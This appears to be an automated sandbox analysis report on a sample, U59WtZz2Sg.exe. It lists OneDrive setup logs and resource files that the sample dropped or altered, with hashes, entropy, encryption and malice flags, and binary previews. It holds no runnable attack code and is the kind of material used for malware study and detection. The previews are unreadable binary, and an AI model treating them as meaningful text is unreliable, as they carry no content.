Size (bytes):	97950
Entropy (8bit):	7.998300751293689
Encrypted:	true
SSDEEP:	1536:CokmzlfcqCe45X/bZ3lg0nsFWZqkibcPsNBt6DyD0l6x+mDd6P7z8LyHKvYv:9kAbuX/bQ0EWZdsNBguDTij8vQv
MD5:	B80F0B827EFE32900A32A0CDE846E496
SHA1:	FDD923B6D995CAF26EBB21AD5AB36479CC087231
SHA-256:	C918E3B8E8565EE66A89735FC90481D6B71385EDA5D40B45CDFB93EAC6B838F9
SHA-512:	276BF9ADF1A8FC53FAE298E539B53073DA9FC7DADF357EEA97F719C3B3936FF724EFB531D253A017CE155F6B62B653FC1E97E7A887763C7FE8B17372449A1FBC
Malicious:	true
Reputation:	unknown
Preview:	MZ...eKD>..'x.\(S......J.,LG..4.S.......q....$.?(..L.@..o.d.......$...H.(L.q...c.y..._.K.f....@y,(X.=p.s.....QE>.RY.......B.l~.RV-K..1HnN..d6Do.......1y.......!....T...zy.0...y?3.e...(..).....N..zapt..[.c.2\|.d.(4.MG.G.c........?........:F....!qhO2...?....p.J.#..Or......}.FX..S..}.6.j..&.)v. 3S..+iG.IT....5..n....Z...smx..F6...z..{........K.g9...pY.v>Yn\|..L.O.].]..f=....:._Y..{../:..e.`...A..F.\|...Ya.i[h..5Q....9e.U..T...(..hn.<...........b.~`.G./J...r.$..z.T.....PE...A.A...e......NL..M.....Gd....@.m=2$f/O.K.'..A./.G.nK....mf.-..V...ld.[:d..}.....1....~:./c3.A.g.....M..?..Q........D.5...H...2Dy...B.,3..In../p....2.~o.+j.].......]R..l..M..Mg..../=I8-.*.j.......G...........M..&..olr.i.u.....'./....].....].T.WLW....4..nc.;a...&.0.......c.....<...~.q....I~".)..F....V1...5J4x..u.2./.....[.........lj.(.[.C...........D...&.......V.ly..9.[(k.........\|j.=F3..GR4.&J.tx...F.......2...u.yZtZ+.....+ZIY<.K......V]...Cy. ..P..-.....8..h.^..N.2..[q..SF....

C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\zu-ZA\FileSync.LocalizedResources.dll.mui

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	MS-DOS executable
Category:	dropped
Size (bytes):	171142
Entropy (8bit):	7.9859510108495275
Encrypted:	false
SSDEEP:	3072:37hpEbTpUtv1cxKiXmpBYqbrOAtRiyFmfpV5zg86nXTrZ2J1oEdo7JAzt:LH4UtXpRGyQfZqMhh5
MD5:	7755FC6F6F9C3301B1BF8583D895A213
SHA1:	AFA6057F79C2EB16B2223B53C25331C25C639299
SHA-256:	84563DD3780F2A9E6A7EE54CA4119DF52AB47C676FEE3C087D248611E08B5C1F
SHA-512:	5A6B9729FBBE5FE96CCDA89439910E6FA722CE10448715B9B0A8C7CD951E58B95A3ACB23D845FF09D67FA1689B4C9033DCACFAFAF62598AF2478BE388F947AA4
Malicious:	false
Reputation:	unknown
Preview:	MZ...........(H..}@\|W@.>...EL......npsi..W}.\|.7.Q...h.c.!.....a5.$...t...@.)H)..I_.i.f..?.....d..%E...~.t,...j....K&[-.8........\..0.x..].kwV....M.`..i.....d'o....% ....nn..........Qk.....J.SeS.$a].Qh1...w.&..A.D.x....^...[ ..U;....".a....:..X....j...a[.\(.(.R...c....$o.5V. G}....W...Ju..OR...`R5.f.....Da.1...Y....Z..L.c._K..4..j...F..=..g.......$k......7M...YTW..SA.N.....LtA.yU...3....F'..Tg......3..f...Q..&.].L...6..}..Y7B.a......++.....IU.r.FG..d..6F.h..L4.()Y...M.A5}.rDk.P.M.J..z[(-.G.IT.y....O..7.b...pU....\|.2."Mc...I.=3F[..[.=A.X0.C.gwM...R.1.J...9l...^..........a.K.;.?..68..n...4..:g5.=.N.[_Z...........Hs.........:...Y.o......Z.2....0.C{...-HZ}.8Wh....-..?....=......9K........_.}...)..#....m............Q...)s....."EB&..We,6.X...9@..8.>.z..Zfx..h.I..C<6..m1;I.)\|....y...I..)....,U.7....L.._............(.$....#..7a.J..4>(.?..?2a.Q..2..k.l...XQ^.....1`...M.Q.^;2R......M.b....@.$d}...v......]T4...k.%]y'..H.c..`..0..<.+V..

C:\Users\user\AppData\Local\Microsoft\OneDrive\setup\ECSConfig.json

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	data
Category:	dropped
Size (bytes):	598
Entropy (8bit):	7.626753725590998
Encrypted:	false
SSDEEP:	12:YquPg3uVZd35O2CJJ7R1CsMgMh6HBlZlTR+WaxYTtlqoHM9Isdtcii9a:Yqu1dY53qcZlTR+FY5ces/bD
MD5:	9F870DB20952CFAE48C0328C2BFE2CF8
SHA1:	A2D37694EB68A1410D4755E7422CF75C48FBBFC7
SHA-256:	E29F39F017BF4E889C3671B4D3B54E42532257511D3F7D9B6BD23466862C23EE
SHA-512:	235315FB5E95D3673A4B15A5C940BBD28479432DF19364DBA3465A5739804285916A713391C3DBA2EBB68F43AA10CA89018FAD2AA292149CBA2F25EAB958EACF
Malicious:	false
Reputation:	unknown
Preview:	{"ODS_.c{S..9.a.:T....9..3.@.N..B.lk R.....S]..w..b...W.;Z.]..A.1l.e.q....EB.}a'.T..q.=....N.jD.....}#.C...N..%.a...)F.x.n..,..T.4...^.......#W.7.J....+.b.....>.......L........W5O}.c.z....1.E.._....B....1.....w~......P..~.&...w...j...@#../.4........n./l.B/......g......?....R....~..t..94......i.*....g.O........lc.\|....W......... ...j\...%.K.p..ST.....6.P.f......@....a).YO/..h..:..4T..W..~_e[....W./..xh....I._(..[~.;.U+.."Z=H...N.'..E.>..\|/..R.....P..}`..D.T.h.....N(.Q..,....e.....S....bK6te1YGPnIbo4GcGOEP3iHx1cFFHBUeguxRGm3XS{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

C:\Users\user\AppData\Local\Microsoft\OneDrive\setup\logs\Install-2019-06-27.1836.5964.1.aodl

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	data
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	0.9882468719364671
Encrypted:	false
SSDEEP:	96:SnX+NrLooag7sNkWbtlWctWg765mDy2b5s51hSoJvSNFYctTPS:Su1ooalW4lJtr79PVU1hSoeYcp
MD5:	5244E9B9A37FAF4B23BEA4722D74126A
SHA1:	B94F7BFE384E429D11B1C756FD71171083E951D5
SHA-256:	2440039D87910456ACB866E65A6CA5E78619539AD37AE9D54038A145312CE2F7
SHA-512:	A5B4A064FB3D3B9AAA53C38806BD76E920AEE3F9327CDEFD4E3CA1C2556F34694AB26A7C614D920EA0A41F9578A92440F9C966CE4F2F54617B720FAF91BBF710
Malicious:	false
Reputation:	unknown
Preview:	EBFGO.:mq...L..0g..fN......F..f..L2.p..TFC......y.m...~=\..i.:...=.i.O...C!.......q... ..e..G.h.vM7.S..u..=.X.5+H}......k.rc.1}Fs.+h..++,k?m.M..eZw8 .G.o.T.:.l...1S.6\y.%F...Nm.Wbc.?.mI.t>iG.b,./#.=.b.2.e...,B..O.g.C....1..!...0)j.....I....mB0...~........^WN(;f.wo..\\|k.`..7....3S...).."$.......+.<I...9+..=9.7-x.M....20@->1.H.N..\|....Z#.tse/_..B..B......M,J.d.....Z.#QFP..2..r........uTJ...e7.......c..T.SY.@B.....Ya.-V.P.h#.k.0(..].-()..=[.aK.]......^.^0}W.\c.....3UJ.`/P.....3y../....,..... >[Dy..(mcQ...UOk.TVd.%.j.+0kTt....n\V....xl?.`..D<....Y.......ycW..S...}Nm.g..-...R.#...r..T.W=.........B.ze..^/#T.../.9..0......y_1.>1.Y..v..UK.g..{fy}q.!....."..@Y..Kx.....$.-Y...=......We..C.o.q*z....`..+3B...m .a.px}..s.FEO.ltt&......D........8.......l........e.X.B..4v<.>.gdeJW..cc.}.....n..$.h).)............,y......d3../}../_..A....1.u.p.[r.J0...e.2..gA.....+q...Ly!.b..l...X....>6.G..._>..4.mF4...:\|a.;.~x0.............e.T.U....O=.n.[..i.......`.8..o.....7

C:\Users\user\AppData\Local\Microsoft\OneDrive\setup\logs\Install-2019-06-27.1836.5964.1.odl

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	data
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	1.1857631941832374
Encrypted:	false
SSDEEP:	96:ELG+oEiQ2rP5JAWq7G71k8zTV89zgHIIFMB4JW8escO5SC7H9R8ZeDQZV6p1ib62:SJ2b5JAW31Bn9IIoscoHYFZV6pkb6m
MD5:	095A4EF74F90B5953D8225CCC42BA3FF
SHA1:	4BB05B8FF7C7BE6CAFFD7554454FADF6FF12F030
SHA-256:	86390665CC84D25335944E044D911BEDEB07F4D742AA974E36A3D5BC8C161065
SHA-512:	723044B8C77935C954908C597B9A1FCCD763D37D5F6C2EB348F45CBE47019321A1754E85CCC1C4359A594D5F0C682FD048AA60FEF1F6E256BFF0F7B4B3D44504
Malicious:	false
Reputation:	unknown
Preview:	EBFGO,..l......0..l..z...L%..E.%@..>.SE...S.....o.WH...._.(.(..4Z/.5...iM.Q\|......XN..6..+.....Y....iH..=...+J. RsM.../..T....yc..F....'.e...^...jF=..}.RH..B..K.\&..8...&...6...f.%....N..C..yon..).5.H=..S._B..\a..LS\.\YH.2...!3.H.I.L._.\|{..C37mG.Y..P........F..H._....&.5.&........y..([...BLOeij.?...]0H....N........L.3..!W.u.......0.-V.....L...B.)~..E..B.'(=7..L .......\..z..j..e.b@.'...s...m..r.1.g.G......I..n...W....C(>Uu.4.R,.b.7.P5 s.e&YXZ.71.,.>.#t..>.O?.q..@P.....~b.b..m...hd....>...8.;..r.G..F....G..O.....A.._{.%.....C....(LUpH'..k.S...i[.3$....Ix.n..(....s...25.$].4..........5..#-...}%.=g...d.!?(.T.7e.T.....M./.hN....F".].E.0....".-V......'..1..+.c~...,..'..b(]..f..).......`.D.....Y.....B.mJ.....o<..+.6.M<....p....s).y....."..,.}..Z.).>7.=.p..U6L..M,.2.@...Xp...F..g...j.....A.F..>..tS....s. V.u.....+.../.d\....v..a...\L...$.....$G.T..\.WhH....l.2.v...............%R..vS.c..'.".I.=p..5.U(.9.K.y..Ek(..&...8.M.0

C:\Users\user\AppData\Local\Microsoft\OneDrive\setup\logs\Install-PerUser-2019-06-27.1836.1304.1.aodl

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	data
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	0.9047411345968637
Encrypted:	false
SSDEEP:	96:L6/YL5I1zVAlsplWKudY1HFXWKP7cqburO0Us9t0HlAHtHRHefGzr7p:LMY1I3AmLW01H1BFburOOv0H4tHRIU
MD5:	1828DB7CFF057F35B268DF345ACB4309
SHA1:	56291082D1F20673771980B0B49F37B0F67491EF
SHA-256:	E07838DFB99F06240CBD7F68A7307D876B58BD0CE3CDB35553860512DC1A08A8
SHA-512:	2598E2CD0A70AA9E6D74C9502787ABFFA270416F9954C515FE89700E48FE03512391CB5115F367A86B21BEC245CB0E19C1805CD1B36732486A86EFD2C64BDC49
Malicious:	false
Reputation:	unknown
Preview:	EBFGO6......I.....iH{&..a..6...szm#..;.......q...k.......]..J......q.....4.../..p..h.>.+..;..m...{/T.,...U.IE..RC..$&2.(t...../3.1......@.!t......W..%.i.3.X...D.... H..w..\|.oJ<;....~6}v...U.K.r.?.l..,..T(..Z...........R.1 ,f.. 3..5....t...j.p@\W..G.'...0.I.....V.M.....$(1i5....MH...M...d.....k_.<..i.=.....J....6;D.E.........p...L_.)...$....{=...5U.......^.....P8......\|.56}..+:..&w.w+ifcZ..E`....G.=...R.z....2Fr:;.Uf.......r.p+>A./x].\|l..g..../.....+..vjm..y&....Y$.G...c14k .........+./_...P.......M..>R.='..H.k.E>s..M.....o.Fc(.f.Q$Y..qs..\|.&&n{]VT_Fvb....42/...eD.@....@ff....d.OxB.~..0...t..`.>...Y5..qm.....2.f.&.....uR[..<.m......e.9..'..z....B.E.#.....Tm..Y..G.d.3].R5A.2..^.....9W.U.."..m{.+@.j.?j8^E..}....$j.F.`.=..-..f....:B.Q.g.....?...,..$O....j........j..(...X.O..q..v.0O..D......$X.^..?tW.J..9.....82..xZ......(..... .Cz,[...wZ7.7..NMu>...[#8.l.....7b/....J...gW...?.Y.j..DP.Nms...804.b.....w]....Hvv.5...c....7.....[%...Q..:.Q.

C:\Users\user\AppData\Local\Microsoft\OneDrive\setup\logs\Install-PerUser-2019-06-27.1836.1304.1.odl

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	data
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	0.213909325922767
Encrypted:	false
SSDEEP:	12:dvnzr4ApfWKwPDwbva7n2AEhKA/MPEdu7vkVEEtnZ6diZKJdfp+v5YqI9Vr9Uk3w:TuKwPia6AEwUavkVEMWi0JdZBLzlsbz
MD5:	5D080E1257309AD4E7C10A463B7DA43B
SHA1:	322FC9E2751C867FCC1D86BE710BD25A0FE02217
SHA-256:	719B7A5A143F51613BB36F3EAFAF79CF0472DCFB530EB38F539CF8DF46FE5CC9
SHA-512:	4C0A9D1D945A977471649ECF1163A5B01B417184CDEB9C31E7E146E5970AD280C190DA0CC0E68EA300C94F97264F5053F77B29DEA79189967D6DB88026A541D4
Malicious:	false
Reputation:	unknown
Preview:	EBFGOn.vy...%x.@b.z....#.LU..6...\....ah.%^.J...Y.....O..u.Q.j..(.#B...t&.M..f....u....h.IkX.....g.VU.l>......z.....7ij.z...X.2.Y..?.9.B>.$....h.u.0O.:M.G,..B...W.a%.n9.f......~..U....z!.HZ...U....&Cw..H./.R\|.s...&............G6..".W6....s+aZ..CR.;....[....q. L.B..X..J/nn..>..F.u...Vc..To...F.B....1h....c.....<.`.'.l...@."..7...\|`..`.8o.j..!.WM..L.:4k.Q...cqek.o.....l$............S:...Z...5.?..4eS-=w......#..gq..+...N..;C..........;..w+....!x.V...No.%.`o....F..%..\.@....&.B9Vim1.k...ap.'..4O^...m.\...O..\..a.2..L.:. Z.7.._Kd8..0.....@....B....7..\|[@....uj.......s.o......eT].jN.g.^\!.7..c.......=.x.y..f....;.R$..5WR.["0.f..P+.(.....%9\|v!.Q.V...<..A!.Sc........>...r.w*.f.5.Q..^.H.Q...;..?........(40.8De..Nd/m(..;......3...W...P.pl`..o.7......."...bZ.v...'._B...K.t.w.D#:.w.e..S...&..K6te1YGPnIbo4GcGOEP3iHx1cFFHBUeguxRGm3XS{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}......................................................................................

C:\Users\user\AppData\Local\Microsoft\OneDrive\setup\logs\Install-PerUser_2019-06-27_113458_1870-1874.log

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	data
Category:	dropped
Size (bytes):	563198
Entropy (8bit):	5.514556000970135
Encrypted:	false
SSDEEP:	6144:LokYXqkTwJfGDQ4ueQZz8e9JLsKpq3L1j0D:Loky1Ep+Q4uXN1DL/sLhq
MD5:	B6C71AD06DB40C488571F41578DA6EA3
SHA1:	C03BCC6A273DBF454A635BEB62B301306216F64D
SHA-256:	58C266FB0756324457FD7E14947A4D88B48B1CFE265CB9A67D3D19E676934937
SHA-512:	A656C56CC57D7502EF0045142224FCDB06D8E2497B0F3490F10D5C797096DF251EDCF0659B613E488B9A2087BCA249FC0980D97CA8B3D81FFC00C03548A42BEF
Malicious:	false
Reputation:	unknown
Preview:	0.6./}...".+..B.....p...1r.$...D..z.&.m....Nl.?.&...P..fG`.%{....)..;......e.?_3.q..3)....c5%..>.l..e.!..).l8....=....s4V.X............!..;31..C...-.....F;f.Dgw.."..3.....xi.jQ..L+/-..........'......./r?H......k{%..-...I#q.yS$=...&...v.M\|.._.n........;..Q....l[.?..4&.....6.b+.... .....Dp..+..l ...P.3.u........Mbi..[g>.w<....:....Is. ^.6.~..T....#..`&.......]..^......E..v.......$O...E....i[..L.8...5.C.M........T.i..%W...+).E....m.......n...-...M.^^.:C..](C.@Y2..]............,...&.......1......h...OP.;..X9]...z\|_.H.R.M..L.By..#.2al...CAH...)..Z.?.....}.w..l..".#A#$%l@..<!..l.e...5t....$..$..J....E%:.ym.....x&.[...b.9.4j..j...n..V1..3..O&.wNv:^9..]{q'.espx.._;m.lC0...n..aq...U6g...{...\|o........7D;>..y#...qp.H...{@......f..................;..,;{..l.j-7...C.B.h!ka.pN...n.;.R... E.GZle.1..I5..)$a...9..KJ..o:..)....Au#b..e8".}.I.D.7k.C.>g..5..C.^.g....uZ..+.~.m....U.$.v^.<@.......C..;T...-3..)y........5"$......D.....JV(.....u!\|.).t.r..".3

C:\Users\user\AppData\Local\Microsoft\OneDrive\setup\logs\Install-PerUser_2019-06-27_183655_1304-3128.log

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	data
Category:	dropped
Size (bytes):	131072
Entropy (8bit):	7.319647222115547
Encrypted:	false
SSDEEP:	3072:egq2B7+SWtHttZNSXO69h4mmL7rL2XZtRC:Vq67+S6N5wmmmHrL2XZtR
MD5:	D583D5EE5A253E303A3D1C6A39E6ED1F
SHA1:	A47A7A7B4931696AF9B8EA961972A0051477C642
SHA-256:	52F4BA2E7A9908604DD2BDE3687AED1997E3841610A930E8D9B70EB7476AE073
SHA-512:	4C4F5337CC1970DC0F6DD2F1E58EFA29AA3EA42D6040CAE983DFF80054D805A98C15ED71A1E0608D424141EEED21D2BDBE4E42D0020132C33B34184E02F2CC6F
Malicious:	false
Reputation:	unknown
Preview:	0.6./.jt2..M..@L..g@4.cP!.'...........o/n...[D.;...b.:.?.T.2Z.. !.f."....5.-......F0d..K@r?......{;...k.9.{..q.......d1.?....\|L.1P!...@....,...4..A).2..%..vz.G..z/.f.7.IGc.H0..ECL`..+X.v.a.D..1?.R.q..O..\|f..U.k........r`..Eb.\.$.....w...^....8.k&2C...I....!_.6.5."E^KX...jUE...\|.-.q.h...>Ba..y......<.....0....W}},~.?.}.9.Y.....9l..8b.7.c. .Z........ ..k..;d....I....q.4.w33.!-.X..xa.'.W.\1.v...I].@.?.. .dGa:......W.b^.r.8Pt8%....y.[......r[...M?.IeQ.Lg..0....kb..i8#.7.....\|...."..mb.3.r.[.c.UA..!..!.b..w...{45~..:....{...7..)..\|i..H@..m..e...c...8B.F.V....`.........]......%,0'8.jy..P..Y..xS...K...d.~...<...c ...ge%....-l.RF....a2.B$..[.....`H...hQ.@'.k......(.....8H.o...39..382.. ,....Bm....~.d./2.k..!7\..4#....P...u.e..6...Q.y...z-wg..X.!...#.$8.tx..qm.....][I.........@..=.V.~9.v.F:J-....y{#..5..+.....G.%..Pux.....~h.vIr.c1^T.?.......T..j._.n38..I.6....._!.%."o$..........`X.....O.~....t..#u...S.#.A...u.G..o.8......-.r.s"...np.'N ..]

C:\Users\user\AppData\Local\Microsoft\OneDrive\setup\logs\Install_2019-06-27_113458_1850-1854.log

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	data
Category:	dropped
Size (bytes):	93812
Entropy (8bit):	7.99787160959675
Encrypted:	true
SSDEEP:	1536:HNAGazI4uH2P788+h3ktTog6MKZI1th7/JBC8iTBKRWGFDJg8Rz2PqunYYi:HN948aT+58ojCt1/JBCXjGD5BYi
MD5:	C6397D455BC146C6ACBF77A64ABFB1FC
SHA1:	6C6B90B8D1D7A7781A32C4F538AE6858B8F39057
SHA-256:	C2DB5FF2113EA9F3658165592B0AD03F418E909436B5427294FC24DD3144A19D
SHA-512:	76029CB8DB87E624DCED5956AACA8D68B49B8EDD1C9C39D6607AEE8C2E7DF50D63B062B6D4E24B1A5ABB94D294280B11E4262500F470793F5BBB614A27C1CB43
Malicious:	true
Reputation:	unknown
Preview:	0.6./b..pO.p..0...F......".9.......tP....2g?.......x....(.........;+xIi...i.<........=,1N...C..=2........1Sz..r.S.&'+9c..}....(.....e)...L..wC.Cjv.....N..G..f..2.7o1.7....H......{...T..W.$...Z..:..wSL_...)......_QAX....qd......A%oAl..+..b?Al..n.......j7.E._....*.I....2.[..&.....K4.h8.[`.e.X...i)Z"..Kd-....h.S...J...w..t....V..A..lu.._............n.O U.0...H...V.w..."}.....!G.5.kp...0..EM6^g..:...&U;....s...%Z7.K...q....P..F.... R..!........dK...9.W.....:E..K)y...F.Z..&.\..b/qa....4..)3\|.~.......E..Hw...e...:............m...T..s.....5..j".}......+0....Ye..&.b../{R..N[.N&.....QM..;....^qO.t.(_.....?.T...w...H.`.,8cI..^..L..Lw.3.>..;.6q....../..DY.@.G.m..9..t........3..A7vr.sW(..w....V/cq.Sf..D.Rl..G.....iw..3..........P....Bb\|"..U.eq..>6..x$d..7b.......>....V_..7.&.1.]>......XR.BR.L.!..xw.f.\.Xj.y...C,e.qP8.i..=.;...xY.:.\|.......a"..s..O..b...x...:\^..d......O...C.a.H..,;.F9.....)...6T/.p..?.b.Uo.[.B..?..q...xkkL..^...S...d...N.el.bm..Y.\.

C:\Users\user\AppData\Local\Microsoft\OneDrive\setup\logs\Install_2019-06-27_183642_5964-4704.log

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	data
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	5.566613634143072
Encrypted:	false
SSDEEP:	768:DCkPFD+Ru8tcefCmRdvpGM5Odc9WhPtGeJZNF+wD1tvoNEfb:D3tD+FRdvpGuXWhweZcUDf
MD5:	28E9C301B0037D9375F75DE7702F79CE
SHA1:	9BC2ABE63319B1684A04C7043299CC802A2171A2
SHA-256:	BACFCD2B8ACC6D273FB65BA1E660B06E19C91E356DE15409B8CB67294D819843
SHA-512:	B9F43CE1450A793965A6317CC7D2F2059A2F136C1F9B057C3B27D44E88DBAFE3C5029E264E51E828ACE32D3B63FF3DCE1737BD0769F795CE14A2FAD26630072A
Malicious:	false
Reputation:	unknown
Preview:	0.6./...... .Pl...C:E.....DW..d..}.....DU8...s..T..Q9...L..^G.R...U..v^.-....(......u..H....a[.p.yi....@..X..]53...".(....d.m....36-.~. v..nF....l.O.5......W..h..k.,.a....nRWVj8.j......c..^..v..f.,..(.14.x.......e..L.H.........J.W.I...U....HU.q.Y...8e&:..s......$..v....L.....;.#...............ZjQ..FX...u..&..3((.$..\k....R.R.lw.L....[...H=m.J....f^.j.....'G3..i..V....pE..-w..gi........u,K.R.X_....T..._..dn.5!..J-:....W.u....?J.j......#..'...B_..z..{..!.sJ+..m.n~2..#Y..!.M......m^..F.H..........}G....~....>..%.....".!V..EP....I\I.J...e.`..d....i.D.I..!.....Y"g.?./...qU...n..\.R7C._LV.......)x...........t{J..o..V..vx.\|P.o....a...V..\|dFO.2.1..C.O(Y.f...V....#.c.P....qw. ..meg..]rW..B.N.#....Ls....r..+.JXj. .q...T......KX...*.^BG..y...LM.tP.u.2.Z."H.../Y.MG.F.u&L.d=n...!0a.....V...\...?..%\|...w...O...qH.h...fV...1F.......W...H.\|k.;...;...1.&f.LO.{..p-./..%q....C.8..zS.,2.#.. W... .....a..$...:&.tq...V/=.c.".L..:6{52.y.p.:E...l...O.

C:\Users\user\AppData\Local\Microsoft\OneDrive\setup\logs\Uninstall-PerMachine_2020-07-27_073929_fc4-179c.log

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	data
Category:	dropped
Size (bytes):	131072
Entropy (8bit):	6.604332079482025
Encrypted:	false
SSDEEP:	1536:DizQI7rbSD2+ZvT7PDUOxJ7eXsMGGJOkz8r20tUtv9QFo5Ru7IJyRK6WF:DiM72+tXLTBeXsQJr8K0mt6a2
MD5:	0BC3658713B5F91EA89055CD3F2250FA
SHA1:	32752C28DFA248FA5DAADD828D235B84C97BE5C7
SHA-256:	AAEFB0620AF8F0C7A81D44F0B860DFE66001F6AF7832F13E65E8524294A9DF23
SHA-512:	E052B144E4F674F93A2F8D9590474452A6A0D0484F3E303E1D48F2E9E9044DF8CEEF563CCBFAA7C47FE5B4D28EE737F9B673558DD572B4243833FDCEF6107D62
Malicious:	false
Reputation:	unknown
Preview:	0.7./z.E....O.q........+..S.D&...X.B\|w...\....k...U.C.3..Dp....M.....x.G.[..Yu.r..oE..z.....w#..(...k..>...R.......2 .a.^d...:.w ......M.j8.7..O....e.i..9zH....OD/t...lP.<.q.-.m.~..L..o.6.5i./&8)/..}..cS..E..O..r........w.....b..\0\.z.Y.d.b_....Pa.[.v).B...W.41.H.;.T.<TX..r..u>.57...8.M. ..bW..i...dr..:....U.[..T..q.....n.2..W=i.po,.W .s....W.....b+6,E>]....W7..f.X..?\.zoi.p.....`.&....d^........=..\..S7.a.............}....lO'...-...xQ..G..M.P.H+....u(]...H.7...$...-^la>.....s.....U......"w..0..c=.......c..:.y........Sg]:.%.zK,....m...O%c0.t5.ib....l...n.<qc6.>..?..e!..D..7.6.u^..,.@Y..a..'HBl..y.....Uyj....X0.\[Ce...y.$.<..y...c..:2K./..K.oN....i9n..QeGi..WfY.{k.g.pU...B...9.gygDx...X.4....!...L..c....%...k.._P.%W..HF.w..Z....Y.9.w.DM6'.cB.{.Z.eL .....SDa.N]..\]uk.k.....a...ZxS....7.....i...Q..(gV;8].0n.....hT.O....x.{.7....5.........h.UH.....mp.@...{.:l...../..K.}.~$......i@..9..j.>..C.A...'.".%_y./.Fv...-.\...m.}....x....Ey.oM

C:\Users\user\AppData\Local\Microsoft\OneDrive\setup\logs\Uninstall-PerMachine_2020-08-26_080035_7d4-44.log

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	data
Category:	dropped
Size (bytes):	131072
Entropy (8bit):	6.466269151881758
Encrypted:	false
SSDEEP:	1536:CLkKZSwNdf1w7+5HPklPeqx3UwGy/wb8PLgsWF2cij+5xfk4NODxzv7MFq6hTw2s:jKRNe5lG23f7PksLcbxfhU1b7qq6C22
MD5:	AE5118D02D9DB07FE4B6A927B8ED1972
SHA1:	A02C4F559D57179AFBC8CF51B1923AE2D9BD065D
SHA-256:	A740A114CC8F3D9B9100CAF92C250F7FA224EBFF22E5833372937DCBC4690EEB
SHA-512:	897C12AB358CAB7C1F6D8E8D5B36BD4E89956AE482D13A187A8DF5C32B71F7492D8EB1A2E612CBB85E1D03B3FE78BAF1AE2CE60557B2A1D743930892A4533A06
Malicious:	false
Reputation:	unknown
Preview:	0.8./..Z. ...7!t&.=..h..9.0..;iT.......k...8.."....'.g....l....i. . ..'...:6..>[..[.t3.EE. L.<bb.z...jl.;w....o9.!B....z..@...8.%.%..A..DO.p....._.e......B.........!.L1......Ve...b.Fz.....n....N'a.F)......A..X.s..@..>..EE4..;.L.UJ.iG..c~V..#\..[.$.D...3.._..X=..l.~..>..."Y{..t.A........0...u.......a.... .s. N.k.{.^...{....pI.S..6(.h..a_R....dq{..X.....%...U..99E...Q..{&........LJ.?.d6..+?v......B.MW,.-.'8....A...?.Ya3){...6/.Cz........`.R\.Q,u..+....(..d.g..9m...ND....,..Hy@.%MX.H....h.`~:...x..........t.....k.(..xK.........9..N.5..yr#.\..P..W{E...a..B:#..A.qy.......".m.....E.K.k."...L.q...+.....$C.......Z9HZ%.c.GQ.\...P,..B......x2o-.,....Q..qz...9....5...jl..?...x...F.Lg.{O'...>`.1.S....O..;K..^...9..!j...h...<...\4...=.0.R:.e........%....r{p.?B.=6..O.......8.B..y.Z=d$........)..+......:rf.N....I..k.O.[H)..Z"..<Gm.)l;.......-Je.UZ.=...P%..h0......DnG..1..f.w.u#.TcZ\|j......:..Z......q..f./.{F..C..z....G.../...=C.T.mI....sS...Q

C:\Users\user\AppData\Local\Microsoft\OneDrive\setup\logs\Uninstall-PerMachine_2020-09-30_074451_aa8-131c.log

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	data
Category:	dropped
Size (bytes):	131072
Entropy (8bit):	6.465560316853726
Encrypted:	false
SSDEEP:	3072:WhzLOMLAqcEOQeXSgYOc/CExmnj82LY0xLDoALy:WVOkAnEORXS5qj82sYy
MD5:	CFFD57342AB7A673EB7E4A87A4595D7A
SHA1:	33745FE0FEC86F0EF5A0D5BF0841C28950E70964
SHA-256:	AEAA2E1FBD372CF07E15AED817CBC2BB9C07F889F39C703E72D98FFF5839EE04
SHA-512:	CEBC84302F64B3CE8BBA736F557C14297A9ADCF8E6F00B02A2C14C0FD96A9D8FF49004CACCE1F403AC7D9D5DD2B0E0A1E06C48C82865DC6CFA948446C05DB050
Malicious:	false
Reputation:	unknown
Preview:	0.9./. -"w..a..ml_.k. ....U.......c......8.-.y~._E.q..D..Fuxl...E..k...F...HY....VW.F...-.1/.G.X.t...8..j...Y..EmR%.....sH9..2..W .....El"....p....pRO......'~.l%.....&.L1....n.:........J.<..(y.........(.:..K.....'..h.Q.9.'..W...G....n Pz.Y..d.>y<.#..X..RA3.W.Zf....t.?.....u.].cy.....V...4.5.9.'.3.v.P...<..=9..._F^..(.........O.5.mv5#...)..g.%g./.,Y...P.e....j...P..wF..N.yQ..<D.{p..._...._P...s~U5....Y.C<c5YC..Vr!#.....5...a.G..j..g.^...=.... H.e2mw\|..E..c...ft.H^.{....f....D..a.....1....b.O.6D..\|60....n..BN...j.d-{[.a..Zn.............b%..'-.PUkJ.Aav)r..&.]....7;Ov._.I.`,S...(\|}.0.0s..X.W6Hb.x..e2.n(.o......\..&......!.h....T...Gh.&....]..fq.....V.R.......h.X.`d...@...Q-..$F^s.0..... ....~.....M..B...,L.$1..c..D...,}.R<...A...E\|=...!_.w..4..\%.i...L{.<.....USB.....$.#6.....+fe../...`.I..p.D^..G.&.E...z7.r..wvM..'...,.s.w.#..,.4.G.3..A1..fJE.h..z.z18......f.I.......6.N.S.cr.O/G%...[.t....q>\|*...Be.S..-.1......c..r)0.)..\x..`P.Q..3.@.P..'.g

C:\Users\user\AppData\Local\Microsoft\OneDrive\setup\logs\Uninstall-PerUser_2020-07-27_073929_178c-1790.log

Download File

